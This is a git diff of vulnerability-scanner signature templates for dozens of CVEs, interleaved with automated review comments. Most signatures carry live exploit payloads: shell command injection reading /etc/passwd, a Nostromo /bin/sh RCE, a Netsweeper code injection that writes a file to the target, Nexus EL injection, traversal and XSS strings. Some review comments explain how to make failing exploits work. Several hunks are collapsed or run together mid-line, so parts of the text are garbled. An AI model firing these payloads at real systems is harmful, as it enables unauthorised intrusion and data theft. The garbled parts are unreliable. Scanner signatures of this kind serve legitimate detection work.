+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}read?mimeType=text/html
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeader", "text/html")
+references:
+ - https://www.cvebase.com/cve/2018/1000129
diff --git a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
new file mode 100644
index 0000000..9fa12a2
--- /dev/null
+++ b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-7609
+info:
+ name: Kibana Timelion Code Execution
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ api/timelion/run
+requests:
+ - method: POST
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "seriesList") && StringSearch("resHeaders", "Content-Type: application/json")
+
+references:
+ - https://www.cvebase.com/cve/2019/7609
diff --git a/cves/kong-api-improper-authorization-cve-2020-11710.yaml b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
new file mode 100644
index 0000000..0931e98
--- /dev/null
+++ b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-11710
+info:
+ name: Kong API Improper Authorization
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ status
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && (StringSearch("resBody", "kong_env") || StringSearch("resBody", "kong_db_cache_miss"))
+
+references:
+ - https://www.cvebase.com/cve/2020/11710
diff --git a/cves/kong-cve-2020-11710 copy.yaml b/cves/kong-cve-2020-11710 copy.yaml
deleted file mode 100644
index 20e4a70..0000000
--- a/cves/kong-cve-2020-11710 copy.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: kong-cve-2020-11710 -info: - name: Kong Admin API - risk: High - -params: - - root: '{{.BaseURL}}' - -variables: - - end: | - / - /status -requests: - - method: GET - url: >- - {{.root}}{{.end}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "kong_env") - - >- - StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss") - -reference: - - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw \ No newline at end of file diff --git a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml new file mode 100644 index 0000000..7ee4fa1 --- /dev/null +++ b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11248 +info: + name: Kubelet PProf Exposed + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + debug/pprof/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "Types of profiles available:") || StringSearch("resBody", "Profile Descriptions") +references: + - https://www.cvebase.com/cve/2019/11248 diff --git a/cves/kubernetes-improper-authentication-cve-2018-18264.yaml b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml new file mode 100644 index 0000000..a267044 --- /dev/null +++ b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml 
@@ -0,0 +1,23 @@
+id: CVE-2018-18264
+info:
+ name: Kubernetes Improper Authentication
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}'
+
+
+variables:
+ - endpoints: |
+ /api/v1/
+ /k8s/api/v1/
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}{{.endpoints}}namespaces/kube-system/secrets/kubernetes-dashboard-certs
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "apiVersion") && StringSearch("response", "objectRef")
+references:
+ - https://www.cvebase.com/cve/2018/18264
\ No newline at end of file
diff --git a/cves/linuxki-rce-cve-2020-7209.yaml b/cves/linuxki-rce-cve-2020-7209.yaml
new file mode 100644
index 0000000..b25b1ac
--- /dev/null
+++ b/cves/linuxki-rce-cve-2020-7209.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-7209
+info:
+ name: LinuxKI Toolset RCE
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ linuxki/experimental/vis/kivis.php
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+
+references:
+ - https://www.cvebase.com/cve/2020/7209
diff --git a/cves/lotus-domino-info-leak-cve-2005-2428.yaml b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
new file mode 100644
index 0000000..d9cd776
--- /dev/null
+++ b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
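Review bot: The second Kubernetes condition, `StringSearch("response", "objectRef")`, looks unsatisfiable: a Secret object returned by the API carries `kind`, `apiVersion`, `metadata` and `data`, whereas `objectRef` is a field of audit-event records — please verify against a real response; `Secret` or `"data"` are what a 200 from this path would actually contain. This is also the only new signature without a `User-Agent` header, and it names its list `endpoints` while every other file uses `endpoint`; aligning both keeps the templates uniform.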
@@ -0,0 +1,21 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino Sensitive Information Leak + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + redirect: false + url: >- + {{.root}}names.nsf/People?OpenView + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && RegexSearch('resBody', '(- + {{.root}}index.php/catalogsearch/advanced/result/?name=e + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 503 && StringSearch("resBody", "Too many connections") + +references: + - https://www.cvebase.com/cve/2020/5777 diff --git a/cves/magento-magmi-xss-cve-2017-7391.yaml b/cves/magento-magmi-xss-cve-2017-7391.yaml new file mode 100644 index 0000000..f928e9b --- /dev/null +++ b/cves/magento-magmi-xss-cve-2017-7391.yaml @@ -0,0 +1,22 @@ +id: CVE-2017-7391 +info: + name: Magento MAGMI XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + magmi/web/ajax_gettime.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '"><') +references: + - https://www.cvebase.com/cve/2017/7391 diff --git a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml new file mode 100644 index 0000000..b486076 --- /dev/null +++ b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml 
@@ -0,0 +1,23 @@ +id: CVE-2020-24223 +info: + name: Mara CMS Reflective XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + contact.php +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '">') + +references: + - https://www.cvebase.com/cve/2020/24223 diff --git a/cves/mida-eframework-rce-cve-2020-15920.yaml b/cves/mida-eframework-rce-cve-2020-15920.yaml new file mode 100644 index 0000000..7d00c51 --- /dev/null +++ b/cves/mida-eframework-rce-cve-2020-15920.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-15920 +info: + name: Mida eFramework RCE + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + PDC/ajaxreq.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + +references: + - https://www.cvebase.com/cve/2020/15920 diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-cve-2020-15505.yaml similarity index 71% rename from cves/mobileiron-rce-probe.yaml rename to cves/mobileiron-rce-cve-2020-15505.yaml index aedb7b5..965a1b3 100644 --- a/cves/mobileiron-rce-probe.yaml +++ b/cves/mobileiron-rce-cve-2020-15505.yaml @@ -1,6 +1,6 @@ -id: mobileiron-rce-probe +id: CVE-2020-15505 info: - name: Mobileiron RCE Probe CVE-2020-15505 + name: MobileIron RCE risk: Potential params: @@ -10,7 +10,6 @@ params: variables: - endpoint: | /mifs/.;/services/LogService - requests: - method: POST redirect: false 
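Review bot: `risk: Potential` on the retained context line of the MobileIron `info` hunk is not one of the levels the rest of the commit uses (Medium, High, Critical), so anything that filters or ranks on `risk` will skip this signature or treat it as unknown. Since the hunk already rewrites `id` and `name`, normalising it here is in scope — pick one of the existing levels and keep the reservation as a comment, e.g. `risk: Medium # probe only: confirms the LogService endpoint answers, not exploitability`.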
@@ -25,7 +24,5 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0 - references: - - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 \ No newline at end of file + - https://www.cvebase.com/cve/2020/15505 \ No newline at end of file diff --git a/cves/ms-sharepoint-rce-cve-2020-1147.yaml b/cves/ms-sharepoint-rce-cve-2020-1147.yaml new file mode 100644 index 0000000..2a97c08 --- /dev/null +++ b/cves/ms-sharepoint-rce-cve-2020-1147.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-1147 +info: + name: Microsoft Sharepoint Server RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + _layouts/15/listform.aspx +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "List does mot exist") && StringSearch("resBody", "It may have been deleted by another user") && (StringSearch("resHeader", "Microsoft-IIS") || StringSearch("resHeader", "X-SharePointHealthScore") ||StringSearch("resHeader", "SharePointError") || StringSearch("resHeader", "SPRequestGuid") || StringSearch("resHeader", "MicrosoftSharePointTeamServices")) +references: + - https://www.cvebase.com/cve/2020/1147 diff --git a/cves/ms-sharepoint-rce-cve-2020-16952.yaml b/cves/ms-sharepoint-rce-cve-2020-16952.yaml new file mode 100644 index 0000000..dfdbb28 --- /dev/null +++ b/cves/ms-sharepoint-rce-cve-2020-16952.yaml 
@@ -0,0 +1,20 @@ +id: CVE-2020-16952 +info: + name: Microsoft SharePoint RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + (StatusCode() == 200 || StatusCode() == 201) && StringSearch("resHeaders", "MicrosoftSharePointTeamServices") && (RegexSearch("resBody", "15\\.0\\.0\\.(4571|5275|4351|5056)") || RegexSearch("resBody", "16\\.0\\.0\\.(10337|10364|10366)")) + +references: + - https://www.cvebase.com/cve/2020/16952 diff --git a/cves/netsweeper-code-injection-cve-2020-13167.yaml b/cves/netsweeper-code-injection-cve-2020-13167.yaml new file mode 100644 index 0000000..2287608 --- /dev/null +++ b/cves/netsweeper-code-injection-cve-2020-13167.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-13167 +info: + name: Netsweeper WebAdmin Python Code Injection + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + webadmin/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 + {{.root}}{{.endpoint}}out + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Referer: "{{.root}}/webadmin/admin/service_manager_data.php" + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "nonexistent") + +references: + - https://www.cvebase.com/cve/2020/13167 diff --git a/cves/nextjs-disclosure.yaml b/cves/nextjs-disclosure.yaml deleted file mode 100644 index 296ad6e..0000000 --- a/cves/nextjs-disclosure.yaml +++ /dev/null 
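Review bot: The CVE-2020-16952 detection is a pure version fingerprint, `RegexSearch("resBody", "15\\.0\\.0\\.(4571|5275|4351|5056)")` and the 16.0 equivalent, against a hard-coded list of builds, so vulnerable builds outside the list are missed and any build that happens to match is reported as `Critical` whether or not it is patched. I cannot confirm from here that these are exactly the affected builds; please record where the list came from in a comment above the detection and consider `risk: Potential`, since no exploit behaviour is observed. The `StatusCode() == 201` alternative for a GET to the site root is unusual and could be dropped.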
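Review bot: The `url:` in the Netsweeper hunk is a `>-` folded scalar containing two URLs, so they fold into one space-separated string rather than two requests; the other multi-target signatures in this commit put each path on its own line under `endpoint: |`, and this one should do the same. The payload also writes a file on the target — the hex decodes to `echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out` — leaving an artifact in the web root of every scanned host, so a non-persistent oracle, or at least a documented clean-up step, is preferable for a detection signature. `Referer: "{{.root}}/webadmin/..."` additionally produces a double slash because `root` already ends with `/`.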
@@ -1,22 +0,0 @@ -id: nextjs-disclosure-01 -info: - name: NestJS CVE-2020-5284 - risk: Medium - confidence: Certain - - -params: - - root: '{{.BaseURL}}' - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/_next/static/../server/pages-manifest.json - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && RegexSearch("response", '\{"/_app":".*?_app\.js"') - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && StringSearch("response", 'typography') && StringSearch("response", 'collection') diff --git a/cves/nextjs-path-traversal-cve-2020-5284.yaml b/cves/nextjs-path-traversal-cve-2020-5284.yaml new file mode 100644 index 0000000..dd55d9b --- /dev/null +++ b/cves/nextjs-path-traversal-cve-2020-5284.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-5284 +info: + name: Next.js Path Traversal + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + _next/static/ + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", 'application/json') && RegexSearch("resBody", '\{"/_app":".*?_app\.js"') + +references: + - https://www.cvebase.com/cve/2020/5284 diff --git a/cves/nexus-cve-2019-7238.yaml b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml similarity index 98% rename from cves/nexus-cve-2019-7238.yaml rename to cves/nexus-repository-manager-rce-cve-2019-7238.yaml index 68a1998..bf947f2 100644 --- a/cves/nexus-cve-2019-7238.yaml +++ b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml 
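Review bot: The new URL, `{{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json` with `endpoint: _next/static/`, expands to `/_next/static/_next/static/../server/pages-manifest.json`, which normalises to `/_next/static/server/...` and no longer traverses out of the static directory the way the deleted `nextjs-disclosure.yaml` did. Use `{{.root}}{{.endpoint}}../server/pages-manifest.json` (or drop the `endpoint` prefix). The rewrite also dropped `redirect: false`; without it a redirect to a page that happens to satisfy the regex could be counted, so it is worth restoring.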
@@ -1,6 +1,6 @@ -id: common-nexus-rce-01 +id: CVE-2019-7238 info: - name: Nexus Repository RCE CVE-2019-7238 + name: Nexus Repository Manager RCE risk: High requests: @@ -19,4 +19,4 @@ requests: reference: - - https://github.com/jas502n/CVE-2019-7238 \ No newline at end of file + - https://www.cvebase.com/cve/2019/7238 \ No newline at end of file diff --git a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml new file mode 100644 index 0000000..83d42d5 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-10199 +info: + name: Nexus Repository Manager RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/beta/repositories/go/group +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/json + body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}' + detections: + - >- + StatusCode() == 400 && StringSearch("resBody", "1787569") + +references: + - https://www.cvebase.com/cve/2020/10199 diff --git a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml new file mode 100644 index 0000000..4e0bb69 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml 
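Review bot: The CVE-2020-10199 request uses `method: GET` while carrying a JSON body to `rest/beta/repositories/go/group`; repository creation on that API is a POST and a GET body is generally ignored, so the EL payload in `memberNames` is unlikely to be evaluated and the `400`/`1787569` detection will not fire. As I recall this issue also requires an authenticated session, which the signature does not supply — note that with `# requires valid Nexus credentials to reach the vulnerable code path` or add an auth parameter. Please also verify the path prefix; Nexus 3 serves this API under `service/rest/`.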
@@ -0,0 +1,24 @@ +id: CVE-2020-10204 +info: + name: Nexus Repository Manager RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + extdirect +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}' + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "1787569") + +references: + - https://www.cvebase.com/cve/2020/10204 diff --git a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml new file mode 100644 index 0000000..37fc18a --- /dev/null +++ b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml @@ -0,0 +1,23 @@ +id: CVE-2017-7529 +info: + name: Nginx Remote Integer Overflow + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + - Range: bytes=-17208,-9223372036854758792 + + detections: + - >- + StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range") +references: + - https://www.cvebase.com/cve/2017/7529 diff --git a/cves/nodejs-path-traversal-cve-2017-14849.yaml b/cves/nodejs-path-traversal-cve-2017-14849.yaml new file mode 100644 index 0000000..78d7f51 --- /dev/null +++ b/cves/nodejs-path-traversal-cve-2017-14849.yaml 
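Review bot: The EL payload in the CVE-2020-10204 body, `"$\\c{1337*1337"`, is missing the closing `}` (compare `"$\\c{ 1337 * 1337 }"` in the CVE-2020-10199 signature), so even a vulnerable instance will not produce `1787569` and the detection can never match; use `"roles":["$\\c{1337*1337}"]`. As with the sibling signature, `method: GET` with a JSON body and no `Content-Type: application/json` header is unlikely to reach the `extdirect` handler as intended, and this issue is, as far as I remember, an authenticated one (the `coreui_User` update action), so credentials need to be documented or parameterised.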
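Review bot: The CVE-2017-7529 signature leaves a bare `variables:` key with no entries; depending on the loader that is a null mapping that may break template parsing, and the other variable-less signatures in this commit (CVE-2020-16952, Nostromo) simply omit the key — drop the line. The oracle `StatusCode() == 206 && StringSearch("resBody", "Content-Range")` is sensible for a multipart byterange reply, but the over-read only manifests on responses served from `proxy_cache`, so a miss against `{{.root}}` does not clear the host; a comment such as `# only detectable on cached responses; probe a proxy_cache'd path if / is not cached` would save the next operator some confusion.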
@@ -0,0 +1,22 @@ +id: CVE-2017-14849 +info: + name: Node.js Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + static/../../../a/../../../.. +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2017/14849 diff --git a/cves/nodejs-path-traversal-cve-2018-3714.yaml b/cves/nodejs-path-traversal-cve-2018-3714.yaml new file mode 100644 index 0000000..fcc6e56 --- /dev/null +++ b/cves/nodejs-path-traversal-cve-2018-3714.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-3714 +info: + name: Node.js Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + node_modules/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../../../../../etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2018/3714 diff --git a/cves/nostromo-rce-cve-2019-16278.yaml b/cves/nostromo-rce-cve-2019-16278.yaml new file mode 100644 index 0000000..77f3935 --- /dev/null +++ b/cves/nostromo-rce-cve-2019-16278.yaml 
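Review bot: Both Node signatures are named "Node.js Path Traversal", but as I recall CVE-2018-3714 is a traversal in the `node-srv` npm package rather than Node.js itself, and CVE-2017-14849 affected only Node.js 8.5.0's static-file handling; naming the actual component (`name: node-srv Path Traversal`) avoids misleading triage. Beyond that, the `node_modules/../../../../../etc/passwd` payload relies on the HTTP client sending the dot-segments unnormalised, which is worth confirming for whatever client the engine uses.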
@@ -0,0 +1,23 @@ +id: CVE-2019-16278 +info: + name: Nostromo RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: POST + url: >- + {{.root}}.%0d./.%0d./.%0d./.%0d./bin/sh + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: >- + echo + echo + cat /etc/passwd 2>&1 + detections: + - >- + RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/16278 diff --git a/cves/nuxeo-ssti-cve-2018-16341.yaml b/cves/nuxeo-ssti-cve-2018-16341.yaml new file mode 100644 index 0000000..8e9da37 --- /dev/null +++ b/cves/nuxeo-ssti-cve-2018-16341.yaml @@ -0,0 +1,21 @@ +id: CVE-2018-16341 +info: + name: Nuxeo SSTI + risk: High + +params: + - root: "{{.BaseURL}}" + +requests: + - method: GET + redirect: false + url: >- + {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135") + +references: + - https://www.cvebase.com/cve/2018/16341 diff --git a/cves/odoo-lfi-cve-2018-15640.yaml b/cves/odoo-lfi-cve-2018-15640.yaml new file mode 100644 index 0000000..556bb12 --- /dev/null +++ b/cves/odoo-lfi-cve-2018-15640.yaml 
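Review bot: The Nostromo body is written as a `>-` folded scalar, which joins `echo`, `echo` and `cat /etc/passwd 2>&1` into the single shell line `echo echo cat /etc/passwd 2>&1`, so `/bin/sh` merely prints the words and `cat` never runs; the exploit needs the three lines intact, i.e. `body: |-`. The detection has no status code guard, which is acceptable for an RCE oracle, but the request executes a command on the target and should say so, e.g. `# intrusive: executes cat /etc/passwd via /bin/sh on the target`.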
@@ -0,0 +1,31 @@ +id: CVE-2018-15640 +info: + name: Odoo LFI + risk: High + +params: + - root: "{{.BaseURL}}" + +variables: + - endpoint: | + /base_import/static/c:/windows/win.ini + /web/static/c:/windows/win.ini + /base/static/c:/windows/win.ini + +requests: + - method: GET + redirect: false + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - X-Requested-With: XMLHttpRequest + - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 + - Accept-Encoding: gzip, deflate + detections: + - >- + StatusCode() == 200 && StringSearch("body", "for 16-bit app support") && StringSearch("body", "[fonts]") + +references: + - https://www.cvebase.com/cve/2018/15640 diff --git a/cves/olimpoks-xss-cve-2020-16270.yaml b/cves/olimpoks-xss-cve-2020-16270.yaml new file mode 100644 index 0000000..c9460f8 --- /dev/null +++ b/cves/olimpoks-xss-cve-2020-16270.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-16270 +info: + name: Olimpoks XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + Auth/Admin +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/ + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "12947g147") + +references: + - https://www.cvebase.com/cve/2019/16270 diff --git a/cves/openfire-ssrf-cve-2019-18394.yaml b/cves/openfire-ssrf-cve-2019-18394.yaml new file mode 100644 index 0000000..cc7ec96 --- /dev/null +++ b/cves/openfire-ssrf-cve-2019-18394.yaml 
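Review bot: The Olimpoks detection searches for `"12947g147"`, the result of evaluating `alert(11470+1477+"g147")`, but a server reflecting the parameter returns the raw payload — the arithmetic only happens in a browser — so the signature cannot match on a reflected XSS. Search for the reflected text instead, e.g. `StringSearch("resBody", 'alert(11470+1477+"g147")')`. The references line points at `cve/2019/16270` while the id is CVE-2020-16270, and `risk: High` is out of step with the other reflected XSS entries in this commit, which are Medium.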
